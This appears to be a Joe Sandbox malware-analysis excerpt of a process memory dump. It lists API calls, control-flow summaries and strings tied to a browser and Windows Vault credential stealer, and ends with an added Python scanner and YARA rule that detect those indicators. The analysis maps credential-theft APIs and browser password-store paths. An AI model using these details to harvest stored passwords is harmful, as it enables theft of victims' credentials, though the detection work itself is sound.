                                                                                                                                                    control_flow_graph 204 408836-40889c memset call 40757a CreateFileW 207 4088a2-4088ba call 4085eb call 40fc89 204->207 212 4088bc-4088cb NtQuerySystemInformation 207->212 213 4088cd 207->213 214 4088d1-4088d8 212->214 213->214 215 4088da-4088ea 214->215 216 4088ec-408903 FindCloseChangeNotification GetCurrentProcessId 214->216 215->207 215->216 217 408905-408909 216->217 218 40892b-408967 call 411196 216->218 217->218 219 40890b 217->219 223 408ae5-408ae8 218->223 224 40896d-408994 call 4091f6 call 407602 _wcsicmp 218->224 222 40890e-408914 219->222 225 408925-408929 222->225 226 408916-40891d 222->226 229 408af6-408b0d call 402778 * 2 223->229 230 408aea-408af3 FreeLibrary 223->230 238 4089c0-4089d0 OpenProcess 224->238 239 408996-4089a7 _wcsicmp 224->239 225->218 225->222 226->225 228 40891f-408922 226->228 228->225 230->229 241 408ad1-408ad4 238->241 242 4089d6-4089db 238->242 239->238 240 4089a9-4089ba _wcsicmp 239->240 240->238 243 408ad6-408adf 240->243 241->223 241->243 244 4089e1 242->244 245 408ac8-408acb CloseHandle 242->245 243->223 243->224 246 4089e4-4089e9 244->246 245->241 247 408a96-408aa4 246->247 248 4089ef-4089f6 246->248 247->246 249 408aaa-408aac 247->249 248->247 250 4089fc-408a23 GetCurrentProcess DuplicateHandle 248->250 249->245 250->247 251 408a25-408a4f memset call 40fc89 250->251 254 408a51-408a63 251->254 255 408a68-408a94 CloseHandle call 407602 * 2 _wcsicmp 251->255 254->255 255->247 260 408aae-408ac6 255->260 260->245
                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040885E
                                                                                                                                                      • Part of subcall function 0040757A: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040AB83,00000000,0040AA36,?,00000000,00000208,?), ref: 00407585
                                                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 00408885
                                                                                                                                                      • Part of subcall function 004085EB: ??2@YAPAXI@Z.MSVCRT ref: 004085F4
                                                                                                                                                      • Part of subcall function 0040FC89: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,004088B3,?,000000FF,00000000,00000104), ref: 0040FC9C
                                                                                                                                                      • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 0040FCB3
                                                                                                                                                      • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0040FCC5
                                                                                                                                                      • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0040FCD7
                                                                                                                                                      • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0040FCE9
                                                                                                                                                      • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 0040FCFB
                                                                                                                                                      • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtQueryObject), ref: 0040FD0D
                                                                                                                                                      • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 0040FD1F
                                                                                                                                                      • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtResumeProcess), ref: 0040FD31
                                                                                                                                                    • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 004088C6
                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 004088EF
                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 004088FA
                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040898B
                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040899E
                                                                                                                                                    • _wcsicmp.MSVCRT ref: 004089B1
                                                                                                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,?,?,000000FF,00000000,00000104), ref: 004089C5
                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 00408A0B
                                                                                                                                                    • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 00408A1A
                                                                                                                                                    • memset.MSVCRT ref: 00408A38
                                                                                                                                                    • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 00408A6B
                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00408A8B
                                                                                                                                                    • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 00408ACB
                                                                                                                                                    • FreeLibrary.KERNELBASE(?,?,?,000000FF,00000000,00000104), ref: 00408AED
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindFreeInformationLibraryNameNotificationOpenQuerySystem
                                                                                                                                                    • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                    • API String ID: 1954110673-3398334509
                                                                                                                                                    • Opcode ID: 4d8f3214a43bd04c3f84bf4d7629163f604b80433559b2a465285cddf8bf93b4
                                                                                                                                                    • Instruction ID: ac6d74245de41f4a68afaf46936feeb9e4215e23a81ac82868d75cf9687b4f7b
                                                                                                                                                    • Opcode Fuzzy Hash: 4d8f3214a43bd04c3f84bf4d7629163f604b80433559b2a465285cddf8bf93b4
                                                                                                                                                    • Instruction Fuzzy Hash: FB9115B1D00209AFDB10EF95C985AAEBBB5FF04305F60447FE949B6291DB399E40CB58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed): block 4422c7-4422cb branches to 4422cd-44233a (LoadLibraryW, GetProcAddress * 7) or directly to 44233b; 4422cd-44233a falls through to 44233b.
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryW.KERNELBASE(vaultcli.dll,?,00000000,00442385,?,00000000,?), ref: 004422D4
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 004422E9
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 004422F6
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 00442303
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,VaultFree), ref: 00442310
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,VaultGetInformation), ref: 0044231D
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0044232B
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 00442334
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                                                    • String ID: VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetInformation$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                                                                                                                    • API String ID: 2238633743-2107673790
                                                                                                                                                    • Opcode ID: 963817e17c3864fb71b6f00927cb3e5fc30341a44c0b645a38e795921616907a
                                                                                                                                                    • Instruction ID: a68d3860b1f677998bacfaa0c7abd00484677722be3dbe7bb4ba7aced869f3e7
                                                                                                                                                    • Opcode Fuzzy Hash: 963817e17c3864fb71b6f00927cb3e5fc30341a44c0b645a38e795921616907a
                                                                                                                                                    • Instruction Fuzzy Hash: CB012874941B04AEEB306F728E88E07BEF4EF94B017108D2EE49A92A10D779A800CE14
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed): entry 411196-4111ec (call 402778, CreateToolhelp32Snapshot, memset, Process32FirstW); loop head 41134c-41135d (Process32NextW) continues to 4111f1-411239 (OpenProcess) or exits via 411363-411373 (CloseHandle); per-process path 41123f-411272 (memset, call 411376) → 411274-411281 → 411283-411290 (GetModuleHandleW) → 411292-4112a8 (GetProcAddress) → 4112ad-4112b4 → 4112b6-4112c3 (QueryFullProcessImageNameW) → 4112c5-4112e9 (call 410df5, call 411140) → 4112ee-4112fa (CloseHandle) → 4112fc-411301 → 411303-411309 → 41130b-411312 (free) or 411314-411326 (call 407475) → 411327-41134a → back to the loop head.
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00402778: free.MSVCRT(00000000,0040E508,?,?,?,?,?,/deleteregkey,/savelangfile,?,?), ref: 0040277F
                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004111B6
                                                                                                                                                    • memset.MSVCRT ref: 004111CB
                                                                                                                                                    • Process32FirstW.KERNEL32(?,?), ref: 004111E7
                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,?,00001000,?,00000000), ref: 0041122C
                                                                                                                                                    • memset.MSVCRT ref: 00411253
                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00411288
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 004112A2
                                                                                                                                                    • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 004112C3
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 004112F4
                                                                                                                                                    • free.MSVCRT(?), ref: 0041130D
                                                                                                                                                    • Process32NextW.KERNEL32(?,0000022C), ref: 00411356
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,0000022C), ref: 00411366
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Handle$CloseProcessProcess32freememset$AddressCreateFirstFullImageModuleNameNextOpenProcQuerySnapshotToolhelp32
                                                                                                                                                    • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                    • API String ID: 3536422406-1740548384
                                                                                                                                                    • Opcode ID: d60c901128d51a1a9a941b54c9a38706e9a618f48074c361322ebbbca8af7aa2
                                                                                                                                                    • Instruction ID: bbba850b15206e26884db202d857e323fd936e243bbe251c85cc099381913945
                                                                                                                                                    • Opcode Fuzzy Hash: d60c901128d51a1a9a941b54c9a38706e9a618f48074c361322ebbbca8af7aa2
                                                                                                                                                    • Instruction Fuzzy Hash: 7E51AF72840258ABDB21DF55CC84EDEB7B9EF94304F1001ABFA18E3261DB759A84CF54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileW.KERNELBASE(00000103,0000038B,00000000,?,00410790,?), ref: 00408457
                                                                                                                                                    • FindNextFileW.KERNELBASE(000000FF,0000038B,00000000,?,00410790,?), ref: 00408475
                                                                                                                                                    • wcslen.MSVCRT ref: 004084A5
                                                                                                                                                    • wcslen.MSVCRT ref: 004084AD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileFindwcslen$FirstNext
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2163959949-0
                                                                                                                                                    • Opcode ID: 80c24c4a0fd4be1e088faab584ff479ea008bcf4405b994ad439e2c2ad98ac31
                                                                                                                                                    • Instruction ID: 6e3c8222864954d55df90d51b8e56744ea09e2897b7152e8bd6019cb1af30d80
                                                                                                                                                    • Opcode Fuzzy Hash: 80c24c4a0fd4be1e088faab584ff479ea008bcf4405b994ad439e2c2ad98ac31
                                                                                                                                                    • Instruction Fuzzy Hash: E5118272515706AFD7149B24D984A9B73DCAF04725F604A3FF09AD31C0FF78A9448B29
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • FindResourceW.KERNELBASE(?,?,?), ref: 00411F05
                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 00411F16
                                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 00411F26
                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 00411F31
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3473537107-0
                                                                                                                                                    • Opcode ID: adc4f220f09edc5477cff5d460e3159a0013e7b06a0f572b2b282906cd572301
                                                                                                                                                    • Instruction ID: cfb809c5d0a350ba8a2f28afb84d758f7034e38599ab5d81eab5ea4ee58a4c6c
                                                                                                                                                    • Opcode Fuzzy Hash: adc4f220f09edc5477cff5d460e3159a0013e7b06a0f572b2b282906cd572301
                                                                                                                                                    • Instruction Fuzzy Hash: 140192367042156BCB295FA5DC4999BBFAEFF867917088036F909C7331DB30D941C688
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00415EAF: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00415EDB
                                                                                                                                                      • Part of subcall function 00415EAF: malloc.MSVCRT ref: 00415EE6
                                                                                                                                                      • Part of subcall function 00415EAF: free.MSVCRT(?), ref: 00415EF6
                                                                                                                                                      • Part of subcall function 00414BCA: GetVersionExW.KERNEL32(?), ref: 00414BED
                                                                                                                                                    • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 00416001
                                                                                                                                                    • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 00416029
                                                                                                                                                    • free.MSVCRT(00000000,?,00000000,?,00000000), ref: 00416032
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1355100292-0
                                                                                                                                                    • Opcode ID: 6d9bbb2232084d268bbffa8b88e6344bd84b9c6ec403a6433ede71687f16327b
                                                                                                                                                    • Instruction ID: 7d405d749a0edc351a3ddf496a078fe72cac754ac47b8191c628d3d1323914f3
                                                                                                                                                    • Opcode Fuzzy Hash: 6d9bbb2232084d268bbffa8b88e6344bd84b9c6ec403a6433ede71687f16327b
                                                                                                                                                    • Instruction Fuzzy Hash: 45219276804108EEEB21EBA4C8849EF7BBCEF09304F1100ABE641D7141E778CEC597A5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 004161BB
                                                                                                                                                    • GetSystemInfo.KERNELBASE(00451CE0,?,00000000,00440C34,00000000,?,?,00000003,00000000,00000000), ref: 004161C4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoSystemmemset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3558857096-0
                                                                                                                                                    • Opcode ID: b2614796881ddab84da0c6407dc57915020354a4b010b0c78962ddc3b3495293
                                                                                                                                                    • Instruction ID: 01e0680712ac90f889d23e176cd2934d89dbbab4f1fad96818c53916f6f4ffc6
                                                                                                                                                    • Opcode Fuzzy Hash: b2614796881ddab84da0c6407dc57915020354a4b010b0c78962ddc3b3495293
                                                                                                                                                    • Instruction Fuzzy Hash: D6E02230A0062067E3217732BE07FCF22848F02348F00403BFA00DA366F6AC881506ED
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph: function at 00410168 (basic blocks 00410168-004107A7), rendered as an image in the original report; the raw edge list is omitted here. The entry block calls 00442A90 and branches to a block calling 00409A34, 00408619, 00409EB8 and 0044236D; the remaining blocks call memset, wcsrchr, wcslen and ExpandEnvironmentStringsW together with the helpers 00401B06, 004063C1, 00406DD9, 00407447, 00407548, 004076A9, 00407E96, 00407EB8, 00407FE8, 0040839D, 004083E1, 00408441, 004084DA, 0040ED6C, 0040F0D5, 0040F2E6, 00410000, 00410075, 00411BBC, 00412270 and 004421EB.
APIs
• memset.MSVCRT ref: 004101DA
• wcsrchr.MSVCRT ref: 004101F2
• memset.MSVCRT ref: 004102D9
• ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Sea Monkey,00000000,00000104), ref: 00410326
  • Part of subcall function 00409A34: _wcslwr.MSVCRT ref: 00409AFC
  • Part of subcall function 00409A34: wcslen.MSVCRT ref: 00409B11
  • Part of subcall function 00408619: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 00408652
  • Part of subcall function 00408619: wcslen.MSVCRT ref: 00408678
  • Part of subcall function 00408619: wcsncmp.MSVCRT(?,?,?,?,00000000,?), ref: 004086AE
  • Part of subcall function 00408619: memset.MSVCRT ref: 00408725
  • Part of subcall function 00408619: memcpy.MSVCRT ref: 00408746
  • Part of subcall function 00409EB8: LoadLibraryW.KERNELBASE(pstorec.dll,00000000,004101A5,?,?,?,?,?,0040328B,?), ref: 00409EC9
  • Part of subcall function 00409EB8: GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00409EDC
  • Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F309
  • Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F31E
  • Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F333
  • Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F348
  • Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F35D
  • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F383
  • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F394
  • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F3CC
  • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F3DA
  • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F413
  • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F421
• memset.MSVCRT ref: 004103AA
• memset.MSVCRT ref: 004103C6
• memset.MSVCRT ref: 004103E2
• memset.MSVCRT ref: 004104F9
  • Part of subcall function 00406DD9: memset.MSVCRT ref: 00406E17
  • Part of subcall function 00406DD9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,?,00000000,?), ref: 00406E30
  • Part of subcall function 00406DD9: memset.MSVCRT ref: 00406E69
  • Part of subcall function 00406DD9: memset.MSVCRT ref: 00406E81
  • Part of subcall function 00406DD9: memset.MSVCRT ref: 00406E99
  • Part of subcall function 00406DD9: memset.MSVCRT ref: 00406EB1
  • Part of subcall function 00406DD9: wcslen.MSVCRT ref: 00406EBC
  • Part of subcall function 00406DD9: wcslen.MSVCRT ref: 00406ECA
  • Part of subcall function 00406DD9: wcslen.MSVCRT ref: 00406EF9
  • Part of subcall function 00406DD9: wcslen.MSVCRT ref: 00406F07
• wcslen.MSVCRT ref: 00410437
• wcslen.MSVCRT ref: 00410446
• wcslen.MSVCRT ref: 0041048B
• wcslen.MSVCRT ref: 0041049A
• memset.MSVCRT ref: 00410562
• memset.MSVCRT ref: 0041057A
• wcslen.MSVCRT ref: 00410593
• wcslen.MSVCRT ref: 004105A1
• wcslen.MSVCRT ref: 004105FC
• wcslen.MSVCRT ref: 0041060A
• memset.MSVCRT ref: 0041068A
• wcslen.MSVCRT ref: 00410699
• wcslen.MSVCRT ref: 00410720
• wcslen.MSVCRT ref: 0041072E
• wcslen.MSVCRT ref: 004106A7
  • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
  • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
  • Part of subcall function 0040839D: wcscmp.MSVCRT ref: 004083BC
  • Part of subcall function 0040839D: wcscmp.MSVCRT ref: 004083CD
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: wcslen$memset$wcscmp$AddressByteCharCredEnumerateEnvironmentExpandLibraryLoadMultiProcStringsWide_wcslwrmemcpywcscatwcscpywcsncmpwcsrchr
• String ID: %programfiles%\Sea Monkey$Google\Chrome SxS\User Data$Google\Chrome\User Data$Opera$Opera\Opera7\profile\wand.dat$Opera\Opera\wand.dat$Path$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe$wand.dat
• API String ID: 3717286792-109336846
• Opcode ID: 950feec3eb3c7ddcc0b68e018bc609b8eaa114617dc979202627b30a43ba34ef
• Instruction ID: 5236af18994b30efd903e1d9b734594bd5ee8d83944705dbeea0fe3cf72f0f99
• Opcode Fuzzy Hash: 950feec3eb3c7ddcc0b68e018bc609b8eaa114617dc979202627b30a43ba34ef
• Instruction Fuzzy Hash: A0F17771901218ABDB20EB51DD85ADEB378AF04714F5444ABF508A7181E7B8AFC4CF9E
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 00403926: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040E305,00000000), ref: 00403945
  • Part of subcall function 00403926: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00403957
  • Part of subcall function 00403926: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040E305,00000000), ref: 0040396B
  • Part of subcall function 00403926: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00403996
• SetErrorMode.KERNELBASE(00008001,00000000,?,00000002), ref: 0040E319
  Note: 00008001 is SEM_FAILCRITICALERRORS | SEM_NOOPENFILEERRORBOX, which suppresses the dialogs a missing drive or DLL would otherwise raise while the tool runs unattended inside the hollowed process.
• GetModuleHandleW.KERNEL32(00000000,00411F7E,00000000,?,00000002), ref: 0040E332
• EnumResourceTypesW.KERNEL32 ref: 0040E339
• ??3@YAXPAX@Z.MSVCRT ref: 0040E4CB
• DeleteObject.GDI32(?), ref: 0040E4E1
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Library$??3@AddressDeleteEnumErrorFreeHandleLoadMessageModeModuleObjectProcResourceTypes
• String ID: $/deleteregkey$/savelangfile
• API String ID: 3591293073-28296030
• Opcode ID: 04717ecad4c52e76b3f79b80568957338dee78a451c8cd20a0ad402c75147398
• Instruction ID: 121834c48f7c844bba9a1922674ad86b62a86fe916e360ab8a1a69ef7a5829fa
• Opcode Fuzzy Hash: 04717ecad4c52e76b3f79b80568957338dee78a451c8cd20a0ad402c75147398
• Instruction Fuzzy Hash: 5451B171408345ABD720AFA2DD4895FB7A8FF84709F000D3EF640A3191DB79D9158B2A
Uniqueness

Uniqueness Score: -1.00%
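The two listings above are what the report's "Yara detected WebBrowserPassView password recovery tool" signature keys on: the function at 00410168 carries the SeaMonkey, Chrome, Chrome SxS and Opera credential-store paths and reaches CredEnumerateW and pstorec.dll!PStoreCreateInstance through its subcalls, and the function at 0040E305 compares the standard NirSoft utility switches /deleteregkey and /savelangfile. The following Python is an added example, not code from the Joe Sandbox report or from the sample: it scans a process-memory buffer for exactly those indicators and emits the same logic as a YARA rule for scanning dumps at scale. The strings are taken from the listings; the buffers it scans are constructed inline, and the match threshold and rule name are this example's own choices. Store paths and switches are matched as UTF-16LE because the listing shows them consumed by wide-char APIs, while the export and import names are matched as ANSI.

```python
"""Scan a memory buffer for the WebBrowserPassView-style indicators in this report.

Added example, not part of the Joe Sandbox report or of the sample. Strings and
API names come from the listings for the functions at 00410168 and 0040E305;
the buffers scanned here are constructed, and the match threshold is this
example's own choice rather than something the report states.
"""
from dataclasses import dataclass, field

# Paths the function at 00410168 hands to wide-char APIs (ExpandEnvironmentStringsW,
# wcslen, wcscmp), so they sit in memory as UTF-16LE.
STORE_PATHS = (
    r"%programfiles%\Sea Monkey",
    r"SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe",
    r"Google\Chrome\User Data",
    r"Google\Chrome SxS\User Data",
    r"Opera\Opera\wand.dat",
    r"Opera\Opera7\profile\wand.dat",
)
# Command-line switches from the function at 0040E305, also wide.
CLI_SWITCHES = ("/deleteregkey", "/savelangfile")
# Protected Storage API resolved at runtime: the DLL name goes to LoadLibraryW
# (wide), the export name to GetProcAddress (ANSI).
PSTORE_DLL = "pstorec.dll"
PSTORE_EXPORT = "PStoreCreateInstance"
# Credential Manager API from the import table (import names are ANSI).
CRED_API = "CredEnumerateW"


def wide(s: str) -> bytes:
    return s.encode("utf-16-le")


def ansi(s: str) -> bytes:
    return s.encode("ascii")


@dataclass
class Verdict:
    store_hits: list = field(default_factory=list)
    switch_hits: list = field(default_factory=list)
    pstore: bool = False
    cred_enum: bool = False

    @property
    def matched(self) -> bool:
        # Several store paths plus either a credential API or both NirSoft switches.
        # Paths alone also occur in backup and migration tools, so they are not enough.
        return len(self.store_hits) >= 3 and (
            self.pstore or self.cred_enum or len(self.switch_hits) == len(CLI_SWITCHES))


def scan(buf: bytes) -> Verdict:
    low = buf.lower()  # bytes.lower() folds ASCII only, so UTF-16LE stays intact
    v = Verdict()
    v.store_hits = [p for p in STORE_PATHS if wide(p).lower() in low]
    v.switch_hits = [s for s in CLI_SWITCHES if wide(s).lower() in low]
    v.pstore = wide(PSTORE_DLL).lower() in low and ansi(PSTORE_EXPORT) in buf
    v.cred_enum = ansi(CRED_API) in buf
    return v


def to_yara(name: str = "webbrowserpassview_unpacked") -> str:
    """Emit the same condition as a YARA rule (rule name is this example's choice)."""
    def esc(s: str) -> str:
        return s.replace("\\", "\\\\")  # YARA text strings use C-style escapes
    lines = [f"rule {name}", "{", "    strings:"]
    for i, p in enumerate(STORE_PATHS):
        lines.append(f'        $s{i} = "{esc(p)}" wide nocase')
    for i, s in enumerate(CLI_SWITCHES):
        lines.append(f'        $c{i} = "{s}" wide nocase')
    lines.append(f'        $api0 = "{PSTORE_DLL}" wide nocase')
    lines.append(f'        $api1 = "{PSTORE_EXPORT}" ascii')
    lines.append(f'        $api2 = "{CRED_API}" ascii')
    lines += ["    condition:", "        3 of ($s*) and (1 of ($api*) or all of ($c*))", "}"]
    return "\n".join(lines)


def build_sample_dump() -> bytes:
    """Constructed stand-in for the 0x400000 region: indicators between filler bytes."""
    filler = b"\x00" * 16 + bytes(range(0x40, 0x60))
    parts = [filler]
    for p in STORE_PATHS:
        parts += [wide(p), b"\x00\x00", filler]
    for s in CLI_SWITCHES:
        parts += [wide(s.upper()), b"\x00\x00", filler]  # case differs on purpose
    parts += [wide(PSTORE_DLL), b"\x00\x00", ansi(PSTORE_EXPORT), b"\x00", filler,
              ansi(CRED_API), b"\x00", filler]
    return b"".join(parts)


def build_benign_dump() -> bytes:
    """Constructed buffer naming one Chrome profile path, as a backup tool might."""
    return b"\x00" * 32 + wide(r"Google\Chrome\User Data") + b"\x00" * 32


if __name__ == "__main__":
    v = scan(build_sample_dump())
    print(f"matched={v.matched} stores={len(v.store_hits)} switches={v.switch_hits} "
          f"pstore={v.pstore} cred_enum={v.cred_enum}")
    print(f"benign matched={scan(build_benign_dump()).matched}")
    print(to_yara())
```

To use it on a real dump, pass the file contents to `scan()`; the threshold deliberately requires more than one path because backup and profile-migration software legitimately references Chrome's User Data directory, and the runtime-resolved pstorec.dll export is the stronger signal since nothing modern has a reason to load it.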

Control-flow Graph

• Executed
• Not Executed
